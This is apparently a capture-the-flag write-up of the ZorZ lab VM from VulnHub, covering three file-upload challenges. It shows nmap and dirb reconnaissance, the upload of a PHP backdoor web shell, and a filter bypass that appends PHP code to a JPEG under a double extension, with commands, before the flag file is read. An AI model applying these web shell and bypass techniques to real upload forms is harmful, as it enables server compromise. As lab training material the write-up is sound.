published on in writeup
tags: tophatsec

TopHatSec: ZorZ

This VM contains 3 web application challenges, which focus on file upload and filter bypass.


Only ports 22 and 80 are open.

[email protected]:~# nmap -n -p- -A

22/tcp open  ssh     (protocol 2.0)
| ssh-hostkey: 
|   1024 48:bb:d8:38:b8:25:a6:6c:5e:7f:67:c9:ec:53:cc:ed (DSA)
|   2048 ec:55:48:93:28:90:f6:bf:3c:cd:e3:90:42:26:3b:5d (RSA)
|_  256 3f:0a:11:c9:59:73:be:df:f7:77:59:65:07:91:d7:d6 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :

Let’s head over to port 80 in a web browser.

Level 1

I downloaded an image off the Internet and uploaded it to the server.

The file uploads, which is good, but now I need to find it… /tmp/phpsu5a08 was not valid (404), as was /tmp/rastamouse.jpg. So now it’s time to break out the web fuzzers! I didn’t get any hits with my usual wfuzz wordlists, but I did with dirb.

The interesting directory is uploads2, though it turns out this is the directory for challenge 2. So I manually tried uploads1 and found rastamouse.jpg there.

I took a copy of /usr/share/webshells/php/php-simple-backdoor.php and uploaded it as catflap1.php. This was uploaded successfully, so it seems this level has no filtering or protection in place at all.

[email protected]:~# curl
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Level 2

Attempting to upload the same PHP file for level 2 fails miserably.

If we intercept the request with burp, we can see there’s a Content-Disposition header. Note the filename, we will change this later.

I sent the POST to Burp Repeater and tried various things to get PHP uploaded. After a few tried, I found that the following combination worked: Injecting PHP code at the end of the image data and modifying the file extension (to force the server to process the PHP data).

Content-Disposition: form-data; name="upfile"; filename="rastamouse.php.jpg"

When you access the URL, the binary data for the image is display in gibberish, but at the very bottom the successful PHP is shown.

[email protected]:~# curl
uid=33(www-data) gid=33(www-data) groups=33(www-data)

To create the same file outside of Burp, it’s as simple as:

[email protected]:~/vulnhub/zorz/2# cat rastamouse.jpg catflap2.php > catflap2.php.jpg

Level 3

It turns out that my file for Level 2 worked for Level 3 as well. That was easy ^_^.

So let’s collect the flag.

$ ls -l
drwxr-xr-x 2 root     root     4096 Feb 18 22:45 l337saucel337

$ ls -l l337saucel337
-rw-r--r-- 1 root root 400 Feb 18 22:45 SECRETFILE

$ cat l337saucel337/SECRETFILE
Great job so far. This box has 3 uploaders.

The first 2 are pure php, the last one is php w/jquery.

To get credit for this challenge, please submit a write-up or instructions
on how you compromised the uploader or uploaders. If you solve 1, 2, or all
of the uploader challenges, feel free to shoot me an email and let me know!

[email protected]

Thanks for playing!